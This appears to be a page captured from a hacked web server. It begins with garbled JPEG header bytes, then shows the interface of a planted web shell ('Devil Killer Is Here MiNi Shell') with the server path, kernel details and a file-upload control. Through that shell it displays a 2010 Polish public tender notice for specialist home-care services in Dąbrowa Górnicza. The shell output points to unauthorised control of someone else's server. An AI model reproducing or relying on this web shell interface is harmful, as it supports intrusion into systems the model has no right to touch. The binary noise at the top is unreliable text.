JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101116/370324-N-2010.html

<p class="kh_header"><b>Dąbrowa Górnicza: Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza</b><br>
<b>Numer ogłoszenia: 370324 - 2010; data zamieszczenia: 16.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Skibińskiego 1, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2622528, faks 032 2613694.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

Organizowanie i świadczenie w miejscu zamieszkania specjalistycznych usług opiekuńczych oraz   specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w Gminie Dąbrowa Górnicza.  ZP12- 82 U - MOPS-2010

Ww. usługi  są świadczone zgodnie z  art.17 ust 1 pkt 11, art.18.1pkt 3, art. 50. 1,art. 50.2 art. 50.4 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U.  z 2009 r. Nr 175 poz. 1362 z późn. zm.) oraz Rozporządzenia  Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. ze zmianą  z dnia 6 lipiec  2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).

Specjalistyczne usługi opiekuńcze są to usługi dostosowane do szczególnych potrzeb życiowych  osób, wynikających z rodzaju ich schorzenia  lub niepełnosprawności ,świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym.

 Do zadań Wykonawcy w zakresie  specjalistycznych usług opiekuńczych  w szczególności należy: 
1. Uczenie i rozwijanie  umiejętności  niezbędnych  do samodzielnego  życia, w tym zwłaszcza:
a) kształtowanie umiejętności  zaspokajania  podstawowych potrzeb życiowych  i umiejętności  społecznego funkcjonowania, motywowanie  do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi  i umiejętności społecznych oraz wspieranie, także w formie asystowania  w codziennych  czynnościach  życiowych  takich , jak:

-   samoobsługa, zwłaszcza wykonywanie czynności gospodarczych  i porządkowych , w tym  
    umiejętność  utrzymania i prowadzenia domu,
-   dbałość o higienę  i wygląd,
-   utrzymywanie kontaktów z domownikami, rówieśnikami , w miejscu  nauki i pracy oraz ze  
    społecznością  lokalną,
-   wspólne organizowanie i spędzanie czasu wolnego,
-   korzystanie z usług różnych instytucji, 
b) interwencje i pomoc w życiu w rodzinie , w tym:
-   pomoc w radzeniu  sobie w  sytuacjach kryzysowych - poradnictwo  specjalistyczne,    
    interwencje kryzysowe,  wsparcie psychologiczne , rozmowy terapeutyczne,
-   ułatwienie  dostępu do edukacji  i kultury,
-  doradztwo, koordynacja działań  innych służb  na rzecz rodziny , której członkiem jest osoba    
    uzyskująca pomoc w formie  specjalistycznych usług,
-   kształtowanie pozytywnych relacji  osoby wspieranej  z osobami bliskimi,
-   współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby  chorującej, 
    niepełnosprawnej, 
c) pomoc w załatwianiu  spraw urzędowych, w tym:
-   w uzyskiwaniu świadczeń  socjalnych, emerytalno -  rentowych,
-   w wypełnianiu dokumentów urzędowych,
d) wspieranie i pomoc  w uzyskaniu zatrudnienia, w tym zwłaszcza:
-   w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego 
    zajęcia, w szczególności uczestnictwo w zajęciach warsztatów  terapii zajęciowej,  
    zakładach aktywności zawodowej, środowiskowych domach samopomocy, centrach i  
    klubach    integracji  społecznej, klubach pracy,
-   w kompletowaniu  dokumentów  potrzebnych do  zatrudnienia,
-   w przygotowaniu do  rozmowy z pracodawcą , wspieranie i asystowanie w kontaktach  z pracodawcą, 
-   w rozwiązywaniu problemów psychicznych  wynikających z pracy lub jej braku,
e) pomoc w gospodarowaniu  pieniędzmi, w tym:
-  nauka planowania budżetu, asystowaniu przy  ponoszeniu wydatków,
-  pomoc w uzyskaniu ulg w opłatach,
-  zwiększanie umiejętności  gospodarowania  własnym budżetem  oraz  usamodzielnienie  
   finansowe,
2. Pielęgnacja- jako wspieranie procesu  leczenia, w tym:
a)  pomoc  w dostępie do świadczeń zdrowotnych,
b) uzgadnianie i pilnowanie terminów  wizyt lekarskich, badań diagnostycznych,
c)  pomoc w wykupywaniu  lub zamawianiu leków w aptece,
d)  pilnowanie przyjmowania leków  oraz  obserwowanie ewentualnych skutków  ubocznych
   ich stosowania,
e)  w szczególnie uzasadnionych przypadkach  zmiana opatrunków , pomoc  w użyciu środków  
   pomocniczych  i materiałów  medycznych, przedmiotów ortopedycznych , a  także  
   w utrzymaniu higieny,
f)  pomoc  w dotarciu do  placówek służby zdrowia, 
g)  pomoc w dotarciu  do placówek rehabilitacyjnych,
3. Rehabilitacja  fizyczna i usprawnienie  zaburzonych  funkcji organizmu  w zakresie  nieobjętym przepisami  ustawy z dnia 27 sierpnia 2004 r. o świadczeniach  opieki zdrowotnej  finansowanych ze środków  publicznych ( Dz. U. Nr 164, poz. 1027  z 2008 r. z późn. zm.).
a)  zgodnie  z zaleceniami  lekarskimi  lub specjalisty   z zakresu  rehabilitacji ruchowej  lub   fizjoterapii,
b)  współpraca ze specjalistami  w zakresie  wspierania psychologiczno -  pedagogicznego
    i edukacyjno - terapeutycznego zmierzającego  do wielostronnej  aktywizacji osoby   korzystającej ze specjalistycznych usług,
4. Pomoc mieszkaniowa , w tym:
a)  w uzyskaniu mieszkania, negocjowaniu i  wnoszeniu opłat,
b) organizacji  drobnych  remontów,  adaptacji, napraw, likwidacji  barier  
   architektonicznych,
c) kształtowanie właściwych  relacji  osoby uzyskującej  pomoc  z sąsiadami i gospodarzem domu,

Specjalistyczne usługi opiekuńcze dla osób z zaburzeniami  psychicznymi  organizowane i świadczone są zgodnie  z art. 18.1 pkt 3, art.50.4 ustawy  z dnia 12 marca 2004 r. o pomocy społecznej  ( Dz. U.  z 2009 r. Nr 175, poz. 1362 z późn. zm.)  oraz  Rozporządzeniem Ministra Polityki Społecznej  z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz. U. z 2005 r.  Nr 189 poz. 1598 ) oraz Rozporządzeniem  Ministra Polityki Społecznej (Dz. U. z 2006 r. Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ), które  określa sprawowanie opieki nad chorym z zaburzeniami psychicznymi. 
 Do zadań Wykonawcy  w zakresie specjalistycznych usług  dla osób z zaburzeniami psychicznymi dostosowanych do szczególnych potrzeb osób wymagających pomocy w formie specjalistycznych usług , wynikających z rodzaju  ich schorzenia  lub niepełnosprawności , świadczonych przez osoby ze specjalistycznym przygotowaniem zawodowym  w szczególności należy:
1. Uczenie i rozwijanie  umiejętności  niezbędnych  do samodzielnego  życia, w tym zwłaszcza:
a) kształtowanie umiejętności  zaspokajania  podstawowych potrzeb życiowych  i umiejętności  społecznego funkcjonowania, motywowanie  do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi  i umiejętności społecznych oraz wspieranie, także w formie asystowania  w codziennych  czynnościach  życiowych  takich , jak:
-  samoobsługa, zwłaszcza wykonywanie czynności gospodarczych  i porządkowych , w tym 
   umiejętność  utrzymania i prowadzenia domu,
-  dbałość o higienę  i wygląd,
-  utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu  nauki i pracy oraz ze  społecznością  lokalną,
-  wspólne organizowanie i spędzanie czasu wolnego,
-  korzystanie z usług różnych instytucji, 
b)  interwencje i pomoc w życiu w rodzinie , w tym:
-  pomoc w radzeniu  sobie w  sytuacjach kryzysowych - poradnictwo  specjalistyczne,  
   interwencje kryzysowe,  wsparcie psychologiczne , rozmowy terapeutyczne,
-  ułatwienie  dostępu do edukacji  i kultury,
-  doradztwo, koordynacja działań  innych służb  na rzecz rodziny , której członkiem jest osoba  
   uzyskująca pomoc w formie  specjalistycznych usług,
-  kształtowanie pozytywnych relacji  osoby wspieranej  z osobami bliskimi,
-  współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby  chorującej,    niepełnosprawnej,
c) pomoc w załatwianiu  spraw urzędowych, w tym:
-  w uzyskiwaniu świadczeń  socjalnych, emerytalno -  rentowych,
-  w wypełnianiu dokumentów urzędowych,
d) wspieranie i pomoc  w uzyskaniu zatrudnienia, w tym zwłaszcza:
-  w szukaniu informacji o pracy, pomoc w znalezieniu zatrudnienia albo alternatywnego  zajęcia, w szczególności uczestnictwo w zajęciach warsztatów  terapii zajęciowej,  zakładach   aktywności zawodowej, środowiskowych domach samopomocy, centrach i  
   klubach     integracji społecznej, klubach pracy ,
-  w kompletowaniu  dokumentów  potrzebnych do  zatrudnienia,
-  w przygotowaniu do  rozmowy z pracodawcą , wspieranie i asystowanie w kontaktach 
   z pracodawcą, 
-  w rozwiązywaniu problemów psychicznych  wynikających z pracy lub jej braku,
e)  pomoc w gospodarowaniu  pieniędzmi, w tym:
-  nauka planowania budżetu, asystowanie przy  ponoszeniu wydatków,
-  pomoc w uzyskaniu ulg w opłatach,
-  zwiększanie umiejętności  gospodarowania  własnym budżetem  oraz  usamodzielnianie   finansowe,

2. Pielęgnacja - jako wspieranie procesu  leczenia, w tym:
-  pomoc  w dostępie do świadczeń zdrowotnych,
-  uzgadnianie i pilnowanie terminów wizyt lekarskich, badań diagnostycznych,
-  pomoc w wykupywaniu  lub zamawianiu leków w aptece,
-  pilnowanie przyjmowania leków  oraz  obserwowanie ewentualnych skutków  ubocznych   ich stosowania,
-  w szczególnie uzasadnionych przypadkach  zmiana opatrunków , pomoc  w użyciu środków  
   pomocniczych  i materiałów  medycznych, przedmiotów ortopedycznych , a  także  w utrzymaniu higieny,
-  pomoc  w dotarciu do  placówek służby zdrowia, 
-  pomoc w dotarciu  do placówek rehabilitacyjnych,

3. Rehabilitacja  fizyczna i usprawnienie  zaburzonych  funkcji organizmu  w zakresie  nieobjętym przepisami  ustawy z dnia 27 sierpnia 2004 r. o  oświadczeniach  opieki zdrowotnej  finansowanych ze środków  publicznych   ( Dz. U. Nr 164, poz. 1027  z 2008 r. z późn. zm.):
a)  zgodnie  z zaleceniami  lekarskimi  lub specjalisty   z zakresu  rehabilitacji ruchowej  lub 
     fizjoterapii,
b)  współpraca ze specjalistami  w zakresie  wspierania psychologiczno -  pedagogicznego 
    i edukacyjno - terapeutycznego zmierzającego  do wielostronnej  aktywizacji osoby
     korzystającej ze specjalistycznych usług,
4. Pomoc mieszkaniowa , w tym:
a)   w uzyskaniu mieszkania, negocjowaniu wnoszeniu opłat,
b)   w organizacji   drobnych  remontów,  adaptacji, napraw, likwidacji  barier 
    architektonicznych,
c)   kształtowanie właściwych  relacji  osoby uzyskującej  pomoc  z sąsiadami i gospodarzem 
    domu,
5. Zapewnienie dzieciom  i młodzieży  z zaburzeniami  psychicznymi  dostępu do zajęć rehabilitacyjnych  i rewalidacyjno -  wychowawczych , w wyjątkowych  przypadkach,  jeżeli nie mają możliwości uzyskania  dostępu do zajęć określonych w ustawie  z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego (Dz. U. Nr 111 poz. 535 z późn. zm.)

 Przewidywana maksymalna  ilość godzin miesięcznie dla  specjalistycznych usług opiekuńczych wynosi: do 2000  godzin w skali miesiąca, w skali zamówienia  maksymalnie do 24 000  godzin.
Przewidywana maksymalna  ilość godzin miesięcznie dla  specjalistycznych usług dla osób z zaburzeniami psychicznymi wynosi: do 1900 godzin w skali miesiąca, w skali zamówienia  maksymalnie  do 22 800 godzin.
Nie wykorzystana ilość godzin w danym miesiącu może być przesunięta do wykorzystania w kolejnych miesiącach, jeżeli zaistnieje taka potrzeba , jednak po uprzednim uzgodnieniu z Zamawiającym.
Zamawiający zastrzega  sobie prawo  zmiany ilości godzin  przedmiotu zamówienia  w zależności od  wysokości posiadanych środków  w roku  budżetowym 2011 oraz  w zależności  od potrzeb wynikających  ze zmiennej ilości  osób kwalifikujących się  do danego rodzaju usług.
Specjalistyczne usługi opiekuńcze oraz specjalistyczne usługi dla osób z zaburzeniami psychicznymi mogą być świadczone  w dni robocze, w dni świąteczne i wolne od pracy w miejscu zamieszkania lub czasowego pobytu osoby, której przyznano pomoc w zakresie specjalistycznych usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi. 
Zlecenie realizacji specjalistycznych usług opiekuńczych lub  specjalistycznych usług dla osób z zaburzeniami psychicznymi  na rzecz konkretnej osoby  będzie przekazywane Wykonawcy na piśmie. Wykonawca otrzyma od pracownika Miejskiego Ośrodka Pomocy Społecznej  kopię decyzji  administracyjnej, zgodnie z którą obejmie klienta  usługą w czasookresach i wymiarze godzin określonych w decyzji administracyjnej.   
Dopuszcza się maksymalnie jedną zmianę osoby świadczącej usługi w okresie obowiązywania decyzji przyznającej świadczenie. W sytuacjach szczególnie uzasadnionych sytuacją klienta  lub Wykonawcy  możliwa jest częstsza zmiana osoby świadczącej usługi  po wcześniejszym  uzgodnieniu z Zamawiającym. 
Za datę rozpoczęcia świadczenia specjalistycznych  usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi  na rzecz klientów  uważa się datę określoną w decyzji administracyjnej. 
W szczególnych okolicznościach (np. powrót klienta ze szpitala, nagłe pogorszenie stanu zdrowia) dopuszcza się możliwość rozpoczęcia świadczenia usług przed wydaniem decyzji administracyjnej na wniosek  Zamawiającego tj. zgłoszenie ustne, telefoniczne lub faksem. Decyzja w takim przypadku zostanie przekazana Wykonawcy niezwłocznie.
 W wyjątkowych sytuacjach np. nagłe pogorszenie stanu zdrowia dopuszcza się możliwość ustnego , telefonicznego lub faksem zgłoszenia zmiany ilości godzin świadczonych specjalistycznych  usług opiekuńczych lub specjalistycznych usług dla osób z zaburzeniami psychicznymi określonych w decyzji administracyjnej, co następnie zostanie potwierdzone nową decyzją administracyjną dostarczoną niezwłocznie Wykonawcy.
  Wykonawca zobowiązany jest objąć klienta usługą niezwłocznie , jednak nie później niż w terminie 12 godzin od chwili zgłoszenia przez Zamawiającego.
Za datę zakończenia świadczenia usług na rzecz klienta uważa się datę określoną w decyzji administracyjnej.
 Opłata za specjalistyczne usługi opiekuńcze jest wnoszona przez osobę uzyskującą pomoc w formie specjalistycznej usługi lub jej opiekuna, bezpośrednio do kasy MOPS lub przelewem na konto w terminie do 15 dnia każdego miesiąca  następującego po miesiącu , w którym wykonano usługę. ( Rozporządzenie Ministra Polityki Społecznej  w sprawie specjalistycznych usług opiekuńczych  Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. z 2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).
W przypadku wnoszenia opłaty przelewem:
  Nr   rachunku MOPS 61 156010102148123691770002
 Dopuszcza się, że  odpłatność za świadczone usługi od klienta będzie dokonywał Wykonawca  indywidualnie od każdego klienta do kasy MOPS na podstawie otrzymanego upoważnienia wystawionego przez klienta , który ma przyznane usługi w drodze decyzji administracyjnej.  Kopię wpłaty KP Wykonawca dostarczy niezwłocznie klientowi.
Wykonawca zobowiązuje się  prowadzić  współpracę z pracownikami socjalnymi oraz innymi upoważnionymi pracownikami MOPS. Przez współpracę rozumie się wymianę informacji dotyczącą  osób i  rodzin  objętych pomocą Ośrodka i korzystających  ze wsparcia w formie specjalistycznych usług opiekuńczych oraz specjalistycznych usług dla osób z zaburzeniami psychicznymi.   
 Do świadczenia specjalistycznych usług opiekuńczych  oraz specjalistycznych usług dla osób  z zaburzeniami psychicznymi  Wykonawca zobowiązany jest zatrudnić osoby sprawne fizycznie i intelektualnie , zdolne do wykonywania prac  fizycznych, posiadające umiejętność  utrzymywania  prawidłowych kontaktów interpersonalnych.    
 Wykonawca ponosi odpowiedzialność za staranność w wyborze osób , przy pomocy których będzie świadczył usługi objęte  niniejszym zamówieniem  oraz prawidłowość  wykonywanych  przez nie czynności  i obowiązków   w zakresie opisanym w niniejszej SIWZ.    
Wykonawca wskaże Zamawiającemu numery telefonów kontaktowych  i numer faksu  Wykonawcy  , inne informacje oraz ustalenia niezbędne dla sprawnego i terminowego wykonania zamówienia. 
Wykonawca ponosi odpowiedzialność za szkody wyrządzone osobom dla których świadczone są usługi przez  Wykonawcę, w  tym w szczególności  przez osoby, przy pomocy których Wykonawca realizuje zamówienie.  
Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę w trakcie wykonywania zamówienia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 85.32.00.00-8, 85.31.21.00-0, 85.00.00.00-9, 85.31.11.00-3, 85.51.12.00-4, 85.31.13.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości , przedmiotu , dat wykonania i odbiorców , oraz załączeniem dokumentu potwierdzającego , że te usługi  zostały wykonane lub są wykonywane należycie -wymagane jest zrealizowanie lub realizacja co najmniej jednego zamówienia świadczenia w miejscu zamieszkania specjalistycznych usług opiekuńczych w ilości nie mniejszej niż 24 000 godzin maksymalnie w skali 12 miesięcy  i realizacja co najmniej jednego zamówienia świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi  w ilości nie mniej niż  22 000 godzin  maksymalnie w skali 12 miesięcy  oraz załączenie dokumentów potwierdzających,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy  złożą wykaz osób , które będą uczestniczyć w wykonaniu zamówienia , wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia  zgodnie  z Rozporządzeniem  Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych ( Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. ze zmianą  z dnia 6 lipiec  2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ), a także zakresu  wykonywanych przez nie czynności , oraz złożenie  oświadczenia  o podstawie dysponowania osobami posiadającymi wymagane uprawnienia do wykonania usługi określonej  w postępowaniu zgodnie z  Rozporządzeniem  Ministra Polityki Społecznej z dnia 22.09.2005 r. w sprawie specjalistycznych usług opiekuńczych ( Dz. U. z 2005 r.  Nr 189 poz. 1598 oraz  Dz. U. ze zmianą  z dnia 6 lipiec  2006 r. , Nr 134, poz. 943 zmieniające rozporządzenie  w sprawie specjalistycznych usług opiekuńczych ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy udokumentują posiadanie opłaconej  polisy ubezpieczeniowej od odpowiedzialności cywilnej, a w przypadku jej braku innego dokumentu potwierdzającego , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na  kwotę co najmniej 50 000zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

